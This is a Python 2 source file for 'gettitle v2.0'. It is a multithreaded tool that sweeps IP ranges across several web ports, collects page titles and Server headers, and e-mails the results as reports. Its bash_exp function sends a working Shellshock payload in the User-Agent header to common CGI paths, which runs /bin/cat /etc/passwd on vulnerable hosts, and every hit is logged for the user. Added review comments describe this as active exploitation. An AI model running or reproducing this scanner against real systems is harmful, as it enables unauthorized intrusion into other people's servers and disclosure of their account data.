python gettitle v2.0

#!/usr/bin/env python
# coding=utf-8

import threading
import requests
import Queue
import sys
import re
import time
import warnings
import datetime
import argparse
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
import smtplib
import httplib

__author__ = 'depycode'
__version__ = 'gettitle v2.0'

# Silences every Python warning for the whole process. The practical effect
# here is to hide the urllib3 InsecureRequestWarning raised by the
# verify=False request in checkServer(); nothing later re-enables warnings,
# so genuine problems (deprecations, resource warnings) are hidden too.
warnings.filterwarnings("ignore")

#ip to num
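def ip2num(ip):
    """Convert a dotted-quad IPv4 string to its 32-bit integer value.

    Args:
        ip: address such as ``'10.0.0.1'``.

    Returns:
        int in ``0 .. 2**32 - 1``; ``num2ip(ip2num(x)) == x`` for valid input.

    Raises:
        ValueError: if *ip* is not exactly four decimal octets in 0..255.
            The original accepted extra octets and values above 255, which
            produced numbers that did not round-trip through num2ip() and
            made ip_range() walk the wrong addresses.
    """
    parts = ip.split('.')
    if len(parts) != 4:
        raise ValueError('expected four dotted octets, got %r' % (ip,))
    value = 0
    for part in parts:
        octet = int(part)
        if not 0 <= octet <= 255:
            raise ValueError('octet out of range 0..255 in %r' % (ip,))
        value = (value << 8) | octet
    return value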

#num to ip
def num2ip(num):
    """Return the dotted-quad string for a 32-bit integer address (inverse of ip2num)."""
    octets = ((num >> shift) & 0xff for shift in (24, 16, 8, 0))
    return '%s.%s.%s.%s'  % tuple(octets)
#
def ip_range(start, end):
    """List every address from *start* to *end* inclusive, skipping those whose last octet is 0.

    Returns an empty list when *end* precedes *start*.
    """
    first = ip2num(start)
    last = ip2num(end)
    hosts = []
    for value in range(first, last + 1):
        if value & 0xff == 0:
            continue  # .0 addresses are left out, as in the original
        hosts.append(num2ip(value))
    return hosts


def bash_exp(host):
    """Send the bash-vulnerability probe to *host* (a full URL) and return it on a hit.

    The User-Agent value is a bash function-definition string followed by a
    command; a CGI endpoint that hands request headers to a vulnerable bash
    runs that command, and the check treats ``root:`` (the first line of
    /etc/passwd) in the response body as a positive. This is an active
    exploitation attempt, not a passive check, and the ``() { :;};`` prefix
    is a well-known IDS/WAF signature, so it is easily logged by the target.

    Returns:
        *host* when the marker is found; ``None`` (the implicit return) when
        it is not, on the 8 s timeout, or on any other error -- the bare
        ``except`` below also hides programming errors in this function.
    """
    headers = {'User-Agent':'() { :;}; echo;/bin/cat /etc/passwd','Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'}
    try:
        res = requests.get(host,headers=headers,timeout=8)
        if "root:" in res.content:
            return host
    except:
        pass
#
def bThread(iplist):
    """Fan *iplist* out to ``SETTHREAD`` worker threads and block until all have finished.

    ``SETTHREAD`` is a module global assigned in ``__main__``; every target is
    queued before any worker starts, so workers only ever drain the queue.
    """
    work = Queue.Queue()
    for target in iplist:
        work.put(target)

    workers = [tThread(work) for _ in xrange(int(SETTHREAD))]
    for worker in workers:
        worker.start()
    for worker in workers:
        worker.join()

#create thread
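class tThread(threading.Thread):
    """Worker that pulls ``ip:port`` targets off a shared queue and runs checkServer() on each."""

    def __init__(self, queue):
        threading.Thread.__init__(self)
        self.queue = queue

    def run(self):
        """Drain the queue; one failing target never stops the worker."""
        while True:
            # The get() must be inside the try: with hundreds of workers,
            # ``while not empty(): get(block=False)`` was a race -- another
            # worker could take the last item in between, Queue.Empty escaped
            # and the thread died with a traceback instead of finishing quietly.
            try:
                host = self.queue.get(block=False)
            except Queue.Empty:
                break
            try:
                checkServer(host)
            except Exception:
                # checkServer() already swallows most errors; anything that
                # still escapes (e.g. a malformed "ip:port") is skipped here.
                continue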

def checkServer(host):
    """Fetch ``http(s)://host``, record status/server/title, then run the bash probe on CGI paths.

    Args:
        host: ``"ip:port"`` string as built in ``__main__``. The port is parsed
            *outside* the ``try`` below, so a host without ``:`` or with a
            non-numeric port raises (IndexError / ValueError) to the caller;
            tThread.run() swallows that and moves to the next target.

    Side effects:
        Prints each result dict, appends it to the module-level ``Data`` list
        and appends every positive bash_exp() URL to ``bash_list``; both lists
        are created in ``__main__``.

    Everything after the port parse sits under a bare ``except: pass``, so
    connection errors, timeouts and programming errors are all silent.
    """
    UA = {'user-agent':'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36'}
    k = int(host.split(':')[1])
    try:
        if k==443:
            aimurl = "https://"+host
            #print aimurl
            # verify=False: the server certificate is not checked, so the
            # "server"/"title" values obtained over HTTPS are unauthenticated.
            response = requests.get(url = aimurl,headers = UA,verify=False,timeout = 8)
        else:
            aimurl = "http://"+host
            #print aimurl
            response = requests.get(url = aimurl,headers = UA,timeout = 8)
            #print response.headers
        status = response.status_code
        try:
            serverText = response.headers['server']
        except:
            serverText = ""  # no Server header in the response
        try:
            # First <title>...</title> in the raw body; re.S lets it span lines.
            titleText1 = re.findall(r'<title>(.*?)</title>',response.content,re.S)[0]
            try:
                # Python 2 str: the utf-8 round trip only validates the bytes ...
                titleText = titleText1.decode('utf-8').encode('utf-8')
            except:
                # ... and non-UTF-8 pages are re-encoded from GBK, lossily.
                titleText = titleText1.decode('gbk','ignore').encode('utf-8','ignore')
        except:
            titleText = ""  # no <title> element matched

        # "server" and "title" are raw response text chosen by the scanned
        # host; report() later interpolates them into the HTML report.
        saveData = {"ip":host,"port":str(k),'aimurl':aimurl,"status":status,"server":serverText,"title":titleText}
        print saveData
        Data.append(saveData)
        # CGI paths tried with the bash probe; every positive URL is collected.
        cgi_poc = ['/cgi-bin/index.cgi','/cgi-bin/login.cgi','/cgi-bin/test-cgi']
        for path in cgi_poc:
            exp_url = aimurl + path
            exp_res = bash_exp(exp_url)
            if exp_res != None:
                bash_list.append(exp_res)
    except:
        pass

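def cmd():
    """Parse the command line and return the list of target hosts (no ports).

    ``-i START-END`` expands an inclusive address range via ip_range();
    ``-f FILE`` reads one host per line. Blank lines in FILE are skipped --
    the original turned each one into an empty target that later failed
    inside checkServer(). A malformed ``-i`` value now exits with the
    parser's usage error instead of an IndexError traceback, and with
    neither option the help text is printed and the process exits.

    Returns:
        list of host strings.

    Raises:
        SystemExit: on usage errors or when no option is given.
    """
    parser = argparse.ArgumentParser(description='GET TITLE .. Author::depycode')
    group = parser.add_mutually_exclusive_group()
    group.add_argument('-i',
                       action="store",
                       dest="iprange",
                       help="use:: python gettitle.py -i 10.100.1.1-10.100.1.254",
    )
    group.add_argument('-f',
                       action="store",
                       dest="ipfile",
                       help="use:: python gettitle.py -f ip.txt",
                       type=str,
    )
    args = parser.parse_args()

    if args.iprange:
        start, sep, end = args.iprange.partition('-')
        if not (sep and start and end):
            parser.error("-i expects START-END, e.g. 10.100.1.1-10.100.1.254")
        return ip_range(start, end)

    if args.ipfile:
        # The handle is closed on return; the original left it to the GC.
        with open(args.ipfile) as handle:
            return [line.strip() for line in handle if line.strip()]

    parser.print_help()
    sys.exit()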

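def report(data):
    """Write the scan results as an HTML table and return the file name.

    Args:
        data: list of the dicts built by checkServer() (keys ``aimurl``,
            ``ip``, ``status``, ``server`` and ``title``).

    Returns:
        Name of the report written to the working directory,
        ``Title-<YYYY-mm-dd-HH-MM>.html``.

    Every cell is HTML-escaped before it is written. ``server`` and ``title``
    are copied verbatim from the scanned host's response, so the unescaped
    interpolation in the original let any scanned server place markup or
    script into the report, which runs when the report is opened in a
    browser. Attribute values are double-quoted so ``quote=True`` covers
    them on both Python 2 (cgi.escape) and 3 (html.escape). The header row
    also gains its missing ``</tr>`` and the ``stauts_code`` typo is fixed.
    """
    try:
        from html import escape as html_escape  # Python 3
    except ImportError:
        from cgi import escape as html_escape  # Python 2

    def cell(value):
        # '%s' % (value,) mirrors the original formatting of non-string values.
        return html_escape('%s' % (value,), quote=True)

    stamp = time.strftime('%Y-%m-%d-%H-%M', time.localtime(time.time()))
    filename = 'Title-' + stamp + '.html'
    with open(filename, "w+") as out:
        out.write('<meta http-equiv="Content-Type" content="text/html; charset=utf-8">'
                  '<table border="1">\n'
                  '<tr><th>url</th><th>status_code</th><th>server</th><th>title</th></tr>\n')
        for entry in data:
            out.write('<tr><td><a target="_blank" href="%s">%s</a></td>'
                      '<td>%s</td><td>%s</td><td>%s</td></tr>\n'
                      % (cell(entry['aimurl']), cell(entry['ip']), cell(entry['status']),
                         cell(entry['server']), cell(entry['title'])))
        out.write("</table>")
    return filename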

def report2txt(data):
    """Write one scanned URL (``aimurl``) per line to ``ip-<timestamp>.txt`` and return the file name."""
    stamp = time.strftime('%Y-%m-%d-%H-%M', time.localtime(time.time()))
    filename = "ip-" + stamp + ".txt"
    with open(filename, "w+") as out:
        out.writelines(entry['aimurl'] + "\n" for entry in data)
    return filename
    
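def reportBash(data):
    """Write the bash-probe hits as an HTML table and return the file name.

    Args:
        data: list of URL strings collected in ``bash_list`` by checkServer().

    Returns:
        ``bash<YYYY-mm-dd-HH-MM>.html`` in the working directory.

    URLs are HTML-escaped before being written; they are built from the
    target list (a user-supplied file or range) and the original wrote them
    raw, so a crafted target could break out of the ``href`` attribute or
    inject markup into the report. Attribute values are double-quoted so
    ``quote=True`` is sufficient on both Python 2 and 3; the header row gains
    its missing ``</tr>`` and ``bash_valu`` is spelled out.
    """
    try:
        from html import escape as html_escape  # Python 3
    except ImportError:
        from cgi import escape as html_escape  # Python 2

    stamp = time.strftime('%Y-%m-%d-%H-%M', time.localtime(time.time()))
    filename = 'bash' + stamp + '.html'
    with open(filename, 'w+') as out:
        out.write('<meta http-equiv="Content-Type" content="text/html; charset=utf-8">'
                  '<table border="1">\n<tr><th>url</th><th>bash_value</th></tr>\n')
        for url in data:
            safe = html_escape('%s' % (url,), quote=True)
            out.write('<tr><td><a target="_blank" href="%s">%s</a></td><td>ON</td></tr>\n' % (safe, safe))
        out.write("</table>")
    return filename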

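def SendMail(f1,f2,f3):
    """E-mail the three report files as attachments.

    Args:
        f1: HTML title report, attached as ``report.html``.
        f2: plain-text URL list, attached as ``ip.txt``.
        f3: HTML bash-probe report, attached as ``bash.html``.

    Recipient, sender, SMTP host and credentials are the redacted
    ``'*************'`` placeholders below and must be filled in before use.
    Any failure while sending is printed, not raised.
    """
    def attachment(path, shown_name):
        # Read and close the file right away; the original opened each report
        # without ever closing the handle.
        with open(path, 'rb') as fh:
            part = MIMEText(fh.read(), 'base64', 'utf-8')
        part["Content-Type"] = 'application/octet-stream'
        # shown_name is only the name displayed in the mail client; it need
        # not match *path*.
        part["Content-Disposition"] = 'attachment; filename="%s"' % shown_name
        return part

    # Build the message with a short text body and the three attachments.
    msg = MIMEMultipart('alternative')
    msg.attach(MIMEText("报告大王-扫描完成", 'plain'))
    msg.attach(attachment(f1, "report.html"))
    msg.attach(attachment(f2, "ip.txt"))
    msg.attach(attachment(f3, "bash.html"))

    # Mail headers.
    msg['to'] = '*************'
    msg['from'] = '*************'
    msg['subject'] = 'Scan Finished'

    # Send the mail.
    try:
        server = smtplib.SMTP()
        server.connect('*************')
        # NOTE(review): this is a plaintext SMTP session -- no starttls() --
        # so the login below transmits the credentials unencrypted.
        server.login('*************','*************')
        server.sendmail(msg['from'], msg['to'],msg.as_string())
        server.quit()
        print(u'发送成功')
    except Exception as e:
        print(str(e))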


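if __name__ == '__main__':
    # Module-level state shared with the worker threads: bThread() reads
    # SETTHREAD, checkServer() appends to Data and bash_list. Assignment at
    # module level already binds globals; the ``global`` statements that used
    # to be here were no-ops (``global`` only has meaning inside a function).
    Data = []
    bash_list = []
    starttime = datetime.datetime.now()

    try:
        SETTHREAD = 500
        iplist1 = cmd()
        ports = [80,81,8080,8000,8888]
        # One "ip:port" target per host/port pair.
        iplist = ['{}:{}'.format(x, y) for x in iplist1 for y in ports]
        print('\n[INFO] Will scan '+str(len(iplist1))+" host...\n")
        bThread(iplist)

    except KeyboardInterrupt:
        print('Keyboard Interrupt!')
        sys.exit()

    filenamehtml_report = report(Data)
    filenametxt_ip = report2txt(Data)
    filenamehtml_report_bash = reportBash(bash_list)
    SendMail(filenamehtml_report,filenametxt_ip,filenamehtml_report_bash)

    endtime = datetime.datetime.now()
    # total_seconds() rather than .seconds, which silently drops whole days.
    print("Finished in "+str(int((endtime - starttime).total_seconds()))+"S")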

 

1:改进了线程 

2:增加bash漏洞检测
